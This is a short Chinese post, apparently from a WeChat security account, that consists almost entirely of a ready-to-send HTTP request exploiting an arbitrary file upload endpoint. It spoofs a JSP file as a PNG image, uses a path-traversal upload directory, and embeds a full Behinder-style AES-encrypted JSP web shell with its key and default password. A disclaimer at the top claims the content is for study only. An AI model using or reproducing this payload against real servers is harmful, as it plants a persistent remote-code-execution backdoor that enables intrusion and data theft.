本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与本公众号无关!读者自行承担其恶果! 数据包: OST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxxx -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form-data; name='input_localfile'; filename='xxx.jsp' Content-Type: image/png <%@page import='java.util.*,javax.crypto.*,javax.crypto.spec.*'%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals('POST')){String k='e45e329feb5d925b';/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue('u',k);Cipher c=Cipher.getInstance('AES');c.init(2,new SecretKeySpec(k.getBytes(),'AES'));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form-data; name='uploadpath' ../webapps/notifymsg/devreport/ -----------------------------570xxxxxxxxx6025274xxxxxxxx1-- |
|